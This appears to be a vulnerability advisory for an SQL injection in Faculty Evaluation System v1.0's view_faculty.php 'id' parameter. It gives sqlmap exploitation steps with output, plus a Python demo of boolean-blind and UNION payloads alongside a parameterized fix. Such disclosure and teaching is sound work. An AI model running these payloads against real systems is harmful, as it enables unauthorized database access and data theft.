Application
- Faculty Evaluation System v1.0
Information
- Input not validated
- No input filtering
- SQL injection flaw
Exploit
File: view_faculty.php
Line #4
// The "id" GET parameter (index.php?page=view_faculty&id=<integer>) is concatenated straight into the query, unquoted and unvalidated
[...]
$qry = $conn->query("SELECT *,concat(firstname,' ',lastname) as name FROM faculty_list where id = ".$_GET['id'])->fetch_array();
[...]
Steps to Exploit:
1. Log in to the application (the page requires an authenticated session)
2. Browse to the following URI: "http://host/eval/index.php?page=view_faculty&id=1"
3. Capture the request with an intercepting proxy and save it to a file (test.txt); the saved request must include the session cookie, otherwise sqlmap is redirected to the login page
4. Exploit with sqlmap, feeding it the saved request with -r:
sqlmap -r test.txt --threads 1 --dbms=mysql --fingerprint
[...]
[INFO] testing MySQL
[INFO] confirming MySQL
[INFO] the back-end DBMS is MySQL
[INFO] actively fingerprinting MySQL
[INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.7
comment injection fingerprint: MySQL 5.6.49
fork fingerprint: MariaDB
[...]
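To make the mechanics behind the fingerprint above concrete, the following is an added example (not code from the Faculty Evaluation System or from the original post). It rebuilds the view_faculty.php query against an in-memory SQLite table, shows the boolean-based and UNION-based probes that sqlmap automates for an integer "id" parameter, and places the parameterized fix beside the vulnerable pattern. The table contents are constructed sample data; SQLite has no concat(), so string concatenation uses `||`, and sqlite_version() stands in for MySQL's version().

```python
"""Added example: the view_faculty.php injection pattern reproduced on SQLite,
with the probes sqlmap uses and a hardened replacement. Not the project's code."""
import sqlite3

# Constructed sample rows standing in for the application's faculty_list table.
SAMPLE_ROWS = [
    (1, "Alice", "Smith"),
    (2, "Bob", "Jones"),
    (3, "Carol", "White"),
]


def make_db():
    """Build an in-memory faculty_list table with the sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.row_factory = sqlite3.Row
    conn.execute(
        "CREATE TABLE faculty_list (id INTEGER PRIMARY KEY, firstname TEXT, lastname TEXT)"
    )
    conn.executemany("INSERT INTO faculty_list VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_view_faculty(conn, id_param):
    """Same shape as view_faculty.php line 4: the raw request parameter is
    concatenated into the SQL text (SQLite `||` replaces MySQL concat()).
    Returns only the first row, mirroring fetch_array()."""
    sql = ("SELECT *, firstname || ' ' || lastname AS name "
           "FROM faculty_list WHERE id = " + str(id_param))
    row = conn.execute(sql).fetchone()
    return dict(row) if row else None


def safe_view_faculty(conn, id_param):
    """Hardened form: reject anything that is not an integer literal, then bind
    the value as a query parameter so it can never change the SQL structure."""
    try:
        faculty_id = int(str(id_param), 10)
    except ValueError:
        raise ValueError("id must be an integer")
    row = conn.execute(
        "SELECT *, firstname || ' ' || lastname AS name "
        "FROM faculty_list WHERE id = ?",
        (faculty_id,),
    ).fetchone()
    return dict(row) if row else None


def boolean_probe(conn, true_payload, false_payload):
    """Boolean-based blind check of the kind sqlmap automates: a condition that
    evaluates TRUE keeps the row, a FALSE one removes it. Returns the two
    'row present?' outcomes as a tuple."""
    return (
        vulnerable_view_faculty(conn, true_payload) is not None,
        vulnerable_view_faculty(conn, false_payload) is not None,
    )


def union_extract_version(conn):
    """UNION-based extraction through the same parameter. The original SELECT
    yields four columns (id, firstname, lastname, name), so the injected SELECT
    must supply four; the DBMS version lands in the firstname column.
    On MySQL the equivalent payload would call version()."""
    payload = "-1 UNION SELECT 1, sqlite_version(), 'x', 'y'"
    row = vulnerable_view_faculty(conn, payload)
    return row["firstname"] if row else None


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_view_faculty(db, "1"))
    print(boolean_probe(db, "1 AND 1=1", "1 AND 1=2"))
    print(union_extract_version(db))
    print(safe_view_faculty(db, "1"))
    try:
        safe_view_faculty(db, "1 AND 1=1")
    except ValueError as exc:
        print("rejected:", exc)
```

The `(True, False)` outcome of the boolean probe is exactly the signal sqlmap's blind techniques key on, and the UNION payload is what its fingerprint and dump stages build on once the column count is known. In the PHP original the equivalent fix is to cast or validate `$_GET['id']` and pass it through a mysqli prepared statement rather than string concatenation.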